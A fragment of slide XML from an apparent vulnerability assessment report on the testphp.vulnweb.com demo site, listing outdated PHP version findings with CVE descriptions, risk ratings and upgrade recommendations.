            <a:off x="870857" y="1776549"/>
            <a:ext cx="9718766" cy="2098765"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.2.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521207" y="883485"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>20. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.9 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="501" name="Google Shape;501;p61"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341120"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="365425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2236100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is older than 5.2.9. Such versions may be affected by several security issues :</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Background color is not correctly validated with a non true color image in function 'imagerotate()'. (CVE-2008-5498)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- A denial of service condition can be triggered by trying to extract zip files that contain files with relative paths in file or directory names.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Function 'explode()' is affected by an unspecified vulnerability.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- It may be possible to trigger a segfault by passing a specially crafted string to function 'json_decode()'.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Function 'xml_error_string()' is affected by a flaw which results in messages being off by one.</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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65425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                                HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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780225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>This allows context-dependent attacker to cause a denial of service via a zip file that contains filenames with relative paths, which is not properly handled during extraction.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65425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1059275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>upgrade to PHP version 5.2.9 or later.</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502" name="Google Shape;502;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7254240" y="4275909"/>
            <a:ext cx="452846" cy="34834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503" name="Google Shape;503;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11051177" y="4275909"/>
            <a:ext cx="452846" cy="34834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504" name="Google Shape;504;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9265920" y="4275909"/>
            <a:ext cx="452846" cy="348342"/>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62"/>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rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.2.9 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Google Shape;510;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722811" y="1550125"/>
            <a:ext cx="10093234" cy="2264229"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.2.9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538624" y="892193"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>21. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.3.11 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="516" name="Google Shape;516;p63"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341120"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="352950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2470625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is earlier than 5.3.11, and as such is potentially affected by multiple vulnerabilities :</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- During the import of environment variables, temporary changes to the 'magic_quotes_gpc' directive are not handled properly. This can lower the difficulty for SQL injection attacks. (CVE-2012-0831)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- The '$_FILES' variable can be corrupted because the names of uploaded files are not properly validated.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>(CVE-2012-1172)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- The 'open_basedir' directive is not properly handled by the functions 'readline_write_history' and 'readline_read_history'.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- The 'header()' function does not detect multi-line headers with a CR. (Bug #60227 / CVE-2011-1398)</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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52950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                              </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>         HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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719225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>This issue allows remote attackers to cause a denial of service (resource consumption).</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52950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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976450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>upgrade to PHP version 5.3.11 or later.</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517" name="Google Shape;517;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7297783" y="4258491"/>
            <a:ext cx="531223" cy="374469"/>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518" name="Google Shape;518;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9248503" y="4258491"/>
            <a:ext cx="531223" cy="374469"/>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519" name="Google Shape;519;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10981509" y="4258491"/>
            <a:ext cx="531223" cy="374469"/>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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="909610"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.3.11 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="Google Shape;525;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="818606" y="1785257"/>
            <a:ext cx="10006148" cy="2325189"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.3.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486373" y="866068"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>22. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
